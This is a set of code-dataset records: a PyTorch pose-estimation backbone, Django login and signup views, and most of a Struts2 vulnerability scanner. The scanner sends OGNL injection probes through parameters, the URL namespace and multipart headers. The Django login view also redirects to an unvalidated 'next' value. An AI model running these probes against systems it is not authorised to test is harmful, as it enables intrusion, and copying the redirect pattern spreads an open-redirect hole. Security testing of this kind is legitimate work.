"line_number": 39, "usage_type": "call"}, {"api_name": "tango.common.Tqdm.tqdm", "line_number": 40, "usage_type": "call"}, {"api_name": "tango.common.Tqdm", "line_number": 40, "usage_type": "name"}, {"api_name": "more_itertools.chunked", "line_number": 41, "usage_type": "call"}, {"api_name": "typing.Iterator", "line_number": 32, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 32, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 32, "usage_type": "name"}, {"api_name": "catwalk.task.Task", "line_number": 67, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 67, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 67, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 67, "usage_type": "name"}, {"api_name": "tango.common.sequences.MappedSequence", "line_number": 69, "usage_type": "call"}, {"api_name": "catwalk.task.InstanceFormat.T5_PROMPT", "line_number": 70, "usage_type": "attribute"}, {"api_name": "catwalk.task.InstanceFormat", "line_number": 70, "usage_type": "name"}, {"api_name": "torch.inference_mode", "line_number": 76, "usage_type": "call"}, {"api_name": "tango.common.Tqdm.tqdm", "line_number": 77, "usage_type": "call"}, {"api_name": "tango.common.Tqdm", "line_number": 77, "usage_type": "name"}, {"api_name": "more_itertools.chunked", "line_number": 78, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 95, "usage_type": "call"}, {"api_name": "typing.Iterator", "line_number": 68, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 68, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 68, "usage_type": "name"}, {"api_name": "catwalk.task.Task", "line_number": 101, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 101, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 101, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 101, "usage_type": "name"}, {"api_name": "catwalk.task.InstanceFormat.T5_PROMPT", "line_number": 103, "usage_type": "attribute"}, {"api_name": "catwalk.task.InstanceFormat", "line_number": 103, "usage_type": "name"}, {"api_name": "catwalk.task.InstanceFormat.HF_QA", "line_number": 105, "usage_type": "attribute"}, {"api_name": "catwalk.task.InstanceFormat", "line_number": 105, "usage_type": "name"}, {"api_name": "catwalk.model.UnsupportedTaskError", "line_number": 108, "usage_type": "call"}, {"api_name": "typing.Iterator", "line_number": 102, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 102, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 102, "usage_type": "name"}, {"api_name": "catwalk.cached_transformers.get", "line_number": 117, "usage_type": "call"}, {"api_name": "transformers.AutoModelForSeq2SeqLM", "line_number": 118, "usage_type": "argument"}, {"api_name": "catwalk.cached_transformers", "line_number": 117, "usage_type": "name"}, {"api_name": "transformers.T5ForConditionalGeneration", "line_number": 116, "usage_type": "name"}, {"api_name": "catwalk.cached_transformers.get_tokenizer", "line_number": 122, "usage_type": "call"}, {"api_name": "transformers.T5TokenizerFast", "line_number": 123, "usage_type": "argument"}, {"api_name": "catwalk.cached_transformers", "line_number": 122, "usage_type": "name"}, {"api_name": "transformers.T5TokenizerFast", "line_number": 121, "usage_type": "name"}, {"api_name": "catwalk.model.Model.register", "line_number": 111, "usage_type": "call"}, {"api_name": "catwalk.model.Model", "line_number": 111, "usage_type": "name"}, {"api_name": "transformers.T5ForConditionalGeneration", "line_number": 131, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 132, "usage_type": "name"}, {"api_name": "transformers.T5TokenizerFast", "line_number": 132, "usage_type": "name"}, {"api_name": "transformers.T5ForConditionalGeneration", "line_number": 137, "usage_type": "name"}, {"api_name": "catwalk.cached_transformers.get_tokenizer", "line_number": 142, "usage_type": "call"}, {"api_name": "transformers.T5TokenizerFast", "line_number": 143, "usage_type": "argument"}, {"api_name": "catwalk.cached_transformers", "line_number": 142, "usage_type": "name"}, {"api_name": "transformers.T5TokenizerFast", "line_number": 140, "usage_type": "name"}, {"api_name": "catwalk.model.Model.register", "line_number": 127, "usage_type": "call"}, {"api_name": "catwalk.model.Model", "line_number": 127, "usage_type": "name"}]}
+{"seq_id": "37638723488", "text": "import argparse\nimport torch.nn as nn\nimport torch\n\ndef _make_divisible(v, divisor, min_value=None):\n \"\"\"\n This function is taken from the original tf repo. It ensures that all layers have a channel number that is divisible by 8\n It can be seen here: https://github.com/tensorflow/models/blob/master/research/slim/nets/mobilenet/mobilenet.py\n :param v:\n :param divisor:\n :param min_value:\n :return:\n \"\"\"\n if min_value is None:\n min_value = divisor\n new_v = max(min_value, int(v + divisor / 2) // divisor * divisor)\n # Make sure that round down does not go down by more than 10%.\n if new_v < 0.9 * v:\n new_v += divisor\n return new_v\n\nclass DeConv(nn.Sequential):\n def __init__(self, in_ch, mid_ch, out_ch, ):\n super(DeConv, self).__init__(\n nn.Conv2d(in_ch + mid_ch, mid_ch, kernel_size=1),\n nn.BatchNorm2d(mid_ch),\n nn.PReLU(mid_ch),\n nn.Conv2d(mid_ch, out_ch, kernel_size=3, padding=1),\n nn.BatchNorm2d(out_ch),\n nn.PReLU(out_ch),\n nn.UpsamplingBilinear2d(scale_factor=2)\n )\n\nclass ConvBNReLU(nn.Sequential):\n def __init__(self, in_planes, out_planes, kernel_size=3, stride=1, groups=1):\n padding = (kernel_size - 1) // 2\n super(ConvBNReLU, self).__init__(\n nn.Conv2d(in_planes, out_planes, kernel_size, stride, padding, groups=groups, bias=False),\n nn.BatchNorm2d(out_planes),\n nn.PReLU(out_planes)\n )\n\nclass InvertedResidual(nn.Module):\n def __init__(self, inp, oup, stride, expand_ratio):\n super(InvertedResidual, self).__init__()\n self.stride = stride\n assert stride in [1, 2]\n\n hidden_dim = int(round(inp * expand_ratio))\n self.use_res_connect = self.stride == 1 and inp == oup\n\n layers = []\n if expand_ratio != 1:\n # pw\n layers.append(ConvBNReLU(inp, hidden_dim, kernel_size=1))\n layers.extend([\n # dw\n ConvBNReLU(hidden_dim, hidden_dim, stride=stride, groups=hidden_dim),\n # pw-linear\n nn.Conv2d(hidden_dim, oup, 1, 1, 0, bias=False),\n nn.BatchNorm2d(oup),\n ])\n self.conv = nn.Sequential(*layers)\n\n def forward(self, x):\n if self.use_res_connect:\n return x + self.conv(x)\n else:\n return self.conv(x)\n\nclass SKBackbone(nn.Module):\n def __init__(self,\n args):\n super(SKBackbone, self).__init__()\n\n assert args.input_size[1] in [256]\n\n inverted_residual_setting = [\n [1, 64, 1, 2], #[-1, 48, 256, 256]\n [6, 48, 2, 2], #[-1, 48, 128, 128]\n [6, 48, 3, 2], #[-1, 48, 64, 64]\n [6, 64, 4, 2], #[-1, 64, 32, 32]\n [6, 96, 3, 2], #[-1, 96, 16, 16]\n [6, 160, 3, 1], #[-1, 160, 8, 8]\n [6, 320, 1, 1], #[-1, 320, 8, 8]\n ]\n\n # building first layer\n input_channel = _make_divisible(args.input_channel * args.width_mult, args.round_nearest)\n\n self.first_conv = ConvBNReLU(3, input_channel, stride=2)\n\n inv_residual = []\n # building inverted residual InvertedResiduals\n for t, c, n, s in inverted_residual_setting:\n output_channel = _make_divisible(c * args.width_mult, args.round_nearest)\n for i in range(n):\n stride = s if i == 0 else 1\n inv_residual.append(InvertedResidual(input_channel, output_channel, stride, expand_ratio=t))\n input_channel = output_channel\n # make it nn.Sequential\n self.inv_residual = nn.Sequential(*inv_residual)\n\n self.last_conv = ConvBNReLU(input_channel, args.embedding_size, kernel_size=1)\n self.final_layer = nn.Conv2d(\n in_channels=256,\n out_channels= args.num_keypoints * 32,\n kernel_size=1,\n stride=1,\n padding=0\n )\n\n def forward(self, x):\n x = self.first_conv(x)\n x = self.inv_residual[0:6](x)\n x2 = x\n x = self.inv_residual[6:10](x)\n x1 = x\n x = self.inv_residual[10:13](x)\n x0 = x\n x = self.inv_residual[13:16](x)\n x = self.inv_residual[16:](x)\n y = self.last_conv(x)\n\n return x0,x1,x2,y\n\n def init_weights(self):\n for j in [self.first_conv, self.inv_residual, self.last_conv]:\n for m in j.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.normal_(m.weight, std=0.001)\n if hasattr(m, 'bias'):\n if m.bias is not None:\n nn.init.constant_(m.bias, 0)\n\ndef msknet_config(parser):\n\n '''\n input_size,\n joint_num,\n input_channel = 48,\n embedding_size = 2048,\n width_mult=1.0,\n round_nearest=8,\n InvertedResidual=None,\n norm_layer=None,\n nn.PReLU=None,\n inverted_residual_setting=None\n '''\n parser.add_argument('--num_keypoints', type=int,\n default=16)\n parser.add_argument('--input_size', type=tuple,\n default=(256,256))\n parser.add_argument('--input_channel', type=int,\n default=48)\n parser.add_argument('--embedding_size', type = int ,default = 2048)\n parser.add_argument('--width_mult', type = float ,default = 1.0)\n\n parser.add_argument('--round_nearest', type = int ,default = 8)\n \n return parser\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description='Arguments for person pose estimation tester')\n \n model = SKBackbone(msknet_config(parser).parse_args(args=[]))\n test_data = torch.rand(1, 3, 256, 256)\n test_outputs = model(test_data)\n x,y,z,w = test_outputs\n print(x.size())\n print(y.size())\n print(z.size())\n print(w.size())\n\n", "repo_name": "qhtLucifer/fall-person-recognition", "sub_path": "models/MSKNet/backbone/backbone.py", "file_name": "backbone.py", "file_ext": "py", "file_size_in_byte": 6020, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.nn.Sequential", "line_number": 22, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 22, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 25, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 26, "usage_type": "name"}, {"api_name": "torch.nn.PReLU", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 27, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 28, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 29, "usage_type": "name"}, {"api_name": "torch.nn.PReLU", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 30, "usage_type": "name"}, {"api_name": "torch.nn.UpsamplingBilinear2d", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 31, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 34, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 34, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 38, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 38, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 39, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 39, "usage_type": "name"}, {"api_name": "torch.nn.PReLU", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 40, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 43, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 43, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 60, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 61, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 61, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 63, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 63, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 71, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 71, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 102, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 105, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 105, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 130, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 130, "usage_type": "name"}, {"api_name": "torch.nn.init.normal_", "line_number": 131, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 131, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 131, "usage_type": "name"}, {"api_name": "torch.nn.init.constant_", "line_number": 134, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 134, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 134, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 164, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 168, "usage_type": "call"}]}
+{"seq_id": "70020438888", "text": "from django.shortcuts import render, redirect\n# detail에서 User 참조할 때 from .models import User 사용금지\n# from .models import User 사용금지\nfrom django.contrib.auth import get_user_model\n# 로그인 세션\nfrom django.contrib.auth import login as auth_login\nfrom django.contrib.auth import logout as auth_logout\nfrom django.contrib.auth.decorators import login_required\n# 로그인 form\nfrom django.contrib.auth.forms import AuthenticationForm\n# 인증과 관련된 곳에 UserCreationForm = 회원가입 form = user과 연결된 ModelForm\n# from django.contrib.auth.forms import UserCreationForm\n# from .forms import CustomUserCreationForm\nfrom .forms import CustomUserChangeForm, CustomUserCreationForm\n\n\n\n# Create your views here.\n# 3. CustomUserCreationForm 사용 (accounts에 정의한 User로 변경)\n# settings.py의 기본 설정은 auth.User였는데 accounts.User로 변경했음\n# 그래서 CustonUserCreationForm으로 변경\n# 장고에 내제되어 있는 Form 사용\ndef signup(request):\n # POST 요청 처리\n # request의 method가 POST라면 회원가입 처리를 해줘야 하고\n if request.method == 'POST':\n # ModelForm로직의 기본\n # 유효성 검사\n # 사용자가 입력한 값을(request.POST) form에 넣음\n form = CustomUserCreationForm(request.POST)\n # 질문: valid한가? \n if form.is_valid():\n form.save()\n return redirect('articles:index')\n # GET 요청일 때\n # 나머지는, GET 요청일때는 Form을 UserCreationForm을 넣어서 \n else:\n form = CustomUserCreationForm()\n # signup.html에 {{ form.as_p }}로 사용함\n context = {\n 'form': form\n }\n return render(request, 'accounts/signup.html', context)\n\n\n'''\n1. 회원가입 form 제공 기능\n\ndef signup(request):\n # 회원가입 form\n form = UserCreationForm()\n # signup.html에 {{ form.as_p }}로 사용함\n context = {\n 'form': form\n }\n return render(request, 'accounts/signup.html', context)\n'''\n\n\n'''\n2. UserCreationForm 사용\n\ndef signup(request):\n # POST 요청 처리\n # request의 method가 POST라면 회원가입 처리를 해줘야 하고\n if request.method == 'POST':\n # ModelForm로직의 기본\n # 유효성 검사\n # 사용자가 입력한 값을(request.POST) form에 넣음\n form = UserCreationForm(request.POST)\n # 질문: valid한가? \n if form.is_valid():\n form.save()\n return redirect('articles:index')\n # GET 요청일 때\n # 나머지는, GET 요청일때는 Form을 UserCreationForm을 넣어서 \n else:\n form = UserCreationForm()\n # signup.html에 {{ form.as_p }}로 사용함\n context = {\n 'form': form\n }\n return render(request, 'accounts/signup.html', context)\n\n\n'''\n\n# User class 참조하는 것만 다름\ndef detail(request, pk):\n # User 정보를 받아오는 쿼리셋 API \n # User class 참조할 때 어떻게 작성? from .models import User가 아닌 from django.contrib.auth import get_user_model\n # user = User.objects.get(pk=pk), User가 아닌 get_user_model()\n user = get_user_model().objects.get(pk=pk)\n context = {\n 'user': user\n }\n return render(request, 'accounts/detail.html', context)\n\n\ndef login(request):\n # 로그인 로직 추가\n if request.method == 'POST':\n # AuthenticationForm은 ModelForm이 아님\n # data의 argument로 request에 POST가 들어올 것 같음\n form = AuthenticationForm(request, data=request.POST)\n if form.is_valid():\n # ModelForm이 아니라서 save() 없음\n # form.save()\n # 이곳에 들어갈 로직은?\n # 세션에 저장, 로그인 함수가 내장되어 있음\n # User정보를 form으로부터 가져올 수 있음\n # login 함수는 request와 user 객체를 인자로 받음\n # user 객체는 form에서 인증된 user 정보를 받을 수 있음\n auth_login(request, form.get_user())\n # request.GET.get('next') : /articles/1/update/\n # request.GET.get('next'), 이 값에 따라서 조건문을 만든다\n return redirect(request.GET.get('next') or 'articles:index') \n else:\n # form 처리 한다고 로그인이 되는 것은 아니여서 로작을 추가해야 한다\n form = AuthenticationForm()\n context = {\n 'form': form\n }\n return render(request, 'accounts/login.html', context)\n\n\n\ndef logout(request):\n auth_logout(request)\n return redirect('articles:index')\n\n\n\n@login_required\ndef update(request):\n if request.method == 'POST':\n form = CustomUserChangeForm(request.POST, instance=request.user)\n if form.is_valid():\n form.save()\n return redirect('accounts:detail', request.user.pk)\n else:\n form = CustomUserChangeForm(instance=request.user)\n context = {\n 'form': form\n }\n return render(request, 'accounts/update.html', context)", "repo_name": "astroastrum/Django", "sub_path": "test_1013/accounts/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 5027, "program_lang": "python", "lang": "ko", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "forms.CustomUserCreationForm", "line_number": 30, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 34, "usage_type": "call"}, {"api_name": "forms.CustomUserCreationForm", "line_number": 38, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 43, "usage_type": "call"}, {"api_name": "django.contrib.auth.get_user_model", "line_number": 93, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 97, "usage_type": "call"}, {"api_name": "django.contrib.auth.forms.AuthenticationForm", "line_number": 105, "usage_type": "call"}, {"api_name": "django.contrib.auth.login", "line_number": 114, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 117, "usage_type": "call"}, {"api_name": "django.contrib.auth.forms.AuthenticationForm", "line_number": 120, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 124, "usage_type": "call"}, {"api_name": "django.contrib.auth.logout", "line_number": 129, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 130, "usage_type": "call"}, {"api_name": "forms.CustomUserChangeForm", "line_number": 137, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 140, "usage_type": "call"}, {"api_name": "forms.CustomUserChangeForm", "line_number": 142, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 146, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 134, "usage_type": "name"}]}
+{"seq_id": "31463177394", "text": "#!/usr/bin/python3\n\nimport sys\nimport requests\nimport argparse\nfrom urllib.parse import urlparse, parse_qs, quote, unquote\nfrom http.cookies import SimpleCookie\nimport re\nimport copy\nfrom colorama import Fore, Style\n\nbracket = f\"{Fore.BLUE}[{Fore.GREEN}*{Fore.BLUE}]{Style.RESET_ALL}\"\nbracket_err = f\"{Fore.BLUE}[{Fore.RED}*{Fore.BLUE}]{Style.RESET_ALL}\"\n\nif len(sys.argv) <= 1:\n print(bracket, 'Struts2Scanner - gh0st27')\n print('\\n%s -h for help.' % (sys.argv[0]))\n exit()\n\ndef get_parser():\n parser = argparse.ArgumentParser(prog='Struts2Scanner.py', usage='Struts2Scanner.py [options] --url \"http://www.site.com/vuln.php?id=1\"')\n parser.add_argument('-u', '--url',\n dest=\"url\",\n help='Target URL (e.g.\"http://www.site.com/vuln.php?id=1&fname=test&lname=tester\")',\n action='store'\n )\n parser.add_argument('--data', dest='data',\n help='Data string to be sent through POST (e.g. \"id=1&fname=test&lname=tester\")', action='store'\n )\n parser.add_argument('--cookies', dest='cookies',\n help='HTTP cookies (eg. \"jsessionid=1234\")',action='store'\n )\n# parser.add_argument('-p', dest='testparam',\n# help='testable parameter',action='store'\n# )\n parser.add_argument('--proxy', dest='proxy', help='Use a proxy to connect to the target URL',\n action='store'\n )\n\n return parser\n\ndef do_Multipart_Post_Request(ttarget, multipart_payload, dict_cookies, proxies_listener, timeout, hheaders, verify, allow_redirects):\n boundary = \"---------------------------735323031399963166993862150\"\n content_type = \"multipart/form-data; boundary=%s\" % (boundary)\n filename = \"gh0st\"\n payload = \"--%s\\r\\nContent-Disposition: form-data; name=\\\"%s\\\"; filename=\\\"%s\\0b\\\"\\r\\nContent-Type: text/plain\\r\\n\\r\\nx\\r\\n--%s--\\r\\n\\r\\n\" % (boundary, filename, str(multipart_payload), boundary)\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',\n 'Content-Type': content_type\n }\n try:\n output = b\"\"\n with requests.post(ttarget, payload, cookies=dict_cookies, proxies=proxies_listener, timeout=timeout, headers=headers, verify=False, allow_redirects=allow_redirects, stream=True) as response:\n for i in response.iter_content():\n output += i\n r_headers = response.headers\n except requests.exceptions.RequestException as e:\n print(bracket_err, e)\n exit()\n return output, r_headers\n\n\ndef do_Get(ttarget, dict_params, dict_cookies, proxies_listener, timeout, hheaders, verify, allow_redirects):\n try:\n output = b\"\"\n with requests.post(ttarget, params=dict_params, cookies=dict_cookies, proxies=proxies_listener, timeout=timeout, headers=hheaders, verify=verify, allow_redirects=allow_redirects, stream=True) as response:\n for i in response.iter_content():\n output += i\n r_headers = response.headers\n except requests.exceptions.RequestException as e:\n print(bracket_err, e)\n exit()\n return output, r_headers\n\n\ndef do_Post(ttarget, raw_data, dict_cookies, proxies_listener, timeout, hheaders, verify, allow_redirects):\n try:\n output = b\"\"\n with requests.post(ttarget, data=raw_data, cookies=dict_cookies, proxies=proxies_listener, timeout=timeout, headers=hheaders, verify=verify, allow_redirects=allow_redirects, stream=True) as response:\n for i in response.iter_content():\n output += i\n r_headers = response.headers\n except requests.exceptions.RequestException as e:\n print(bracket_err, e)\n exit()\n return output, r_headers\n\n\ndef main():\n parser = get_parser()\n args = vars(parser.parse_args())\n url, data, cookies, proxy = args['url'], args['data'],args['cookies'], args['proxy']\n\n # parse url & query string\n parsed_url = urlparse(url)\n target_url = parsed_url.geturl()\n query_param = parse_qs(parsed_url.query)\n\n if parsed_url.scheme == 'http':\n ns_target = parsed_url.scheme + \"://\" + parsed_url.netloc\n elif parsed_url.scheme =='https':\n ns_target = parsed_url.scheme + \"://\" + parsed_url.netloc\n else:\n print(bracket_err, 'Target URL must start with http or https (e.g.\"http://www.site.com/vuln.php\" )')\n exit()\n\n path = parsed_url.path\n\n #convert cookie into dictionay if present\n if cookies is not None:\n cookie = SimpleCookie()\n cookie.load(cookies)\n cookies = {}\n for key, morsel in cookie.items():\n cookies[key] = morsel.value\n else:\n cookies = None\n\n #Setup proxy listener\n if proxy is not None and proxy != '':\n proxies = {\n 'http': 'http://%s' % (proxy),\n 'https': 'http://%s' % (proxy)\n }\n else:\n proxies = None\n\n #convert post data to dictionary if present\n if data is not None:\n data = data\n else:\n data = None\n\n #Request parameters\n target = parsed_url.geturl()\n timeout = 5\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',\n 'Content-Type': 'application/x-www-form-urlencoded'\n }\n allow_redirects = True\n verify = False\n dict_cookies = cookies\n proxies_listener = proxies\n dict_param = query_param\n raw_data = data\n\n #checking for ambigiuos request\n if raw_data is not None and bool(dict_param):\n print(bracket_err, \"Malformed Request Found.\\n Exiting......\")\n exit()\n\n check(target, ns_target, path, raw_data, dict_param, timeout, headers, allow_redirects, verify, dict_cookies, proxies_listener)\n\ndef check(target, ns_target, path, raw_data, dict_param, timeout, headers, allow_redirects, verify, dict_cookies, proxies_listener):\n\n #OGNL Injection\n ttarget = copy.copy(target)\n hheaders = headers.copy()\n check_payload = 'ghost${\"zkzz\".toString().replace(\"k\", \"z\")}'\n if raw_data is not None:\n data_url_decoded = unquote(raw_data)\n dict_data = dict(subString.split(\"=\") for subString in data_url_decoded.split(\"&\"))\n for key in dict_data.keys():\n temp_dict_data = dict_data.copy()\n temp_dict_data[key] = check_payload\n# print('Checking POST parameter {} for OGNL Injection using payload \" {} \" '.format(key, check_payload))\n output, r_headers = do_Post(ttarget, temp_dict_data, dict_cookies, proxies_listener, timeout, hheaders, verify, allow_redirects)\n match = re.search(r'ghostzzzz', str(output))\n if match:\n print(bracket, \"POST parameter '{}' is vulnerable OGNL Injection\".format(key))\n else:\n print(bracket_err, \"POST parameter '{}' is not vulnerable to OGNL Injectin\".format(key))\n temp_dict_data.clear()\n else:\n for key in dict_param.keys():\n temp = dict_param.copy()\n temp[key] = check_payload\n# print('Checking GET parameter {} for OGNL Injection using payload \" {} \" '.format(key, check_payload))\n output, r_headers = do_Get(ttarget, dict_param, dict_cookies, proxies_listener, timeout, hheaders, verify, allow_redirects)\n match = re.search(r'ghostzzzz', str(output))\n if match:\n print(bracket, \"GET Query paramater '{}' is vulnerable OGNL Injection\".format(key))\n else:\n print(bracket_err, \"GET Query Parameter '{}' is not vulnerable to OGNL Injectin\".format(key))\n temp.clear()\n\n #checking for namespace redirect cve-2018-11776\n if raw_data is not None:\n del ttarget\n ttarget = ns_target + \"/\" + quote(check_payload) + path\n # print('Checking Namespace Redirect OGNL Injection using payload \" {} \" '.format(check_payload))\n output, r_headers = do_Post(ttarget, dict_data, dict_cookies, proxies_listener, timeout, hheaders, verify, allow_redirects)\n match = re.search(r'ghostzzzz', str(output))\n if match:\n print(bracket, \"Target is vulnerable to Namespace Redirect OGNL Injection\")\n else:\n print(bracket_err, \"Target is not vulnerable to Namespace Redirect OGNL Injection\")\n\n else:\n del ttarget\n ttarget = ns_target + \"/\" + quote(check_payload) + path\n # print('Checking Namespace Redirect OGNL Injection using payload \" {} \" '.format(check_payload))\n output, r_headers = do_Get(ttarget, dict_param, dict_cookies, proxies_listener, timeout, hheaders, verify, allow_redirects)\n match = re.search(r'ghostzzzz', str(output))\n if match:\n print(bracket, \"Target is vulnerable to Namespace Redirect OGNL Injection\")\n else:\n print(bracket_err, \"Target is not vulnerable to Namespace Redirect OGNL Injection\")\n\n # Checking for Jakarta Multipart parser OGNL Injection - Content type header\n multipart_payload = \"%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('strutsExploiter','gh0st27')}.multipart/form-data\"\n hheaders['Content-Type'] = str(multipart_payload)\n del ttarget\n ttarget = target\n if raw_data is not None:\n# print('Checking Jakarta Multipart parser OGNL Injection on Content Type header')\n payload, r_headers = do_Post(ttarget, dict_data, dict_cookies, proxies_listener, timeout, hheaders, verify, allow_redirects=False)\n if 'strutsExploiter' in r_headers.keys():\n if r_headers['strutsExploiter'] == 'gh0st27':\n print(bracket, \"Target is vulnerable to Jakarta Multipart parser OGNL Injection on Content Type header\")\n else:\n print(bracket_err, \"Target is not vulnerable to Jakarta Multipart parser OGNL Injection on Content Type header\")\n else:\n# print('Checking Jakarta Multipart parser OGNL Injection on Content Type header')\n payload, r_headers = do_Get(ttarget, dict_param, dict_cookies, proxies_listener, timeout, hheaders, verify, allow_redirects=False)\n if 'strutsExploiter' in r_headers.keys():\n if r_headers['strutsExploiter'] == 'gh0st27':\n print(bracket, \"Target is vulnerable to Jakarta Multipart parser OGNL Injection on Content Type header\")\n else:\n print(bracket_err, \"Target is not vulnerable to Jakarta Multipart parser OGNL Injection on Content Type header\")\n hheaders.clear()\n\n # Checking for Jakarta Multipart parser OGNL Injection - Content disposition header\n ttarget = copy.copy(target)\n payload, r_headers = do_Multipart_Post_Request(ttarget, multipart_payload, dict_cookies, proxies_listener, timeout, hheaders, verify, allow_redirects=False)\n if 'strutsExploiter' in r_headers.keys():\n if r_headers['strutsExploiter'] == 'gh0st27':\n print(bracket, \"Target is vulnerable to Jakarta based file upload Multipart parser on Content Disposition\")\n else:\n print(bracket_err, \"Target is not vulnerable to Jakarta based file upload Multipart on Content Disposition\")\n\n\nif __name__ =='__main__':\n try:\n main()\n except KeyboardInterrupt:\n print('\\n', bracket_err, 'KeyboardInterrupt Detected.')\n print(bracket_err, 'Exiting...')\n exit()\n", "repo_name": "gh0st27/Struts2Scanner", "sub_path": "Struts2Scanner.py", "file_name": "Struts2Scanner.py", "file_ext": "py", "file_size_in_byte": 11510, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "colorama.Fore.BLUE", "line_number": 12, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 12, "usage_type": "name"}, {"api_name": "colorama.Fore.GREEN", "line_number": 12, "usage_type": "attribute"}, {"api_name": "colorama.Style.RESET_ALL", "line_number": 12, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 12, "usage_type": "name"}, {"api_name": "colorama.Fore.BLUE", "line_number": 13, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 13, "usage_type": "name"}, {"api_name": "colorama.Fore.RED", "line_number": 13, "usage_type": "attribute"}, {"api_name": "colorama.Style.RESET_ALL", "line_number": 13, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 13, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 15, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 17, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 21, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 53, "usage_type": "call"}, {"api_name": "requests.exceptions", "line_number": 57, "usage_type": "attribute"}, {"api_name": "requests.post", "line_number": 66, "usage_type": "call"}, {"api_name": "requests.exceptions", "line_number": 70, "usage_type": "attribute"}, {"api_name": "requests.post", "line_number": 79, "usage_type": "call"}, {"api_name": "requests.exceptions", "line_number": 83, "usage_type": "attribute"}, {"api_name": "urllib.parse.urlparse", "line_number": 95, "usage_type": "call"}, {"api_name": "urllib.parse.parse_qs", "line_number": 97, "usage_type": "call"}, {"api_name": "http.cookies.SimpleCookie", "line_number": 111, "usage_type": 